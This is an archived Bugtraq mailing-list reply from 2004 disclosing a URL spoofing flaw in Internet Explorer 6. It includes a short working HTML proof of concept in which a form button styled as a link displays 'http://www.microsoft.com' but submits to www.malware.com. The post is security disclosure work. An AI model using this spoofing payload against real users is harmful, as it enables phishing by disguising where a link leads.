[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: New URL spoofing bug in Microsoft Internet Explorer

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer
From: "http-equiv@xxxxxxxxxx " <1@xxxxxxxxxxx>
Date: Sat, 30 Oct 2004 18:16:07 -0000


I also want to play

<base href="http://www.microsoft.com";>

<a href=><form action="http://www.malware.com"; 
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; 
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: 
transparent;TEXT-DECORATION: underline" type=submit 
value=http://www.microsoft.com></form></a>

This still works in IE 6 SP2 XP 123 whatever, since patched and 
from back in March 2004 [see: 
http://www.securityfocus.com/bid/10023 ]. Only difference being 
the base href and open a href.

http://www.malware.com/mwaresoft.html

Interestingly Outlook Express gets it right this time.



-- 
http://www.malware.com

Prev by Date: RE: New URL spoofing bug in Microsoft Internet Explorer
Previous by thread: Re: New URL spoofing bug in Microsoft Internet Explorer
Next by thread: [ GLSA 200410-30 ] GPdf, KPDF, KOffice: Vulnerabilities in included xpdf
Index(es):
- Date
- Thread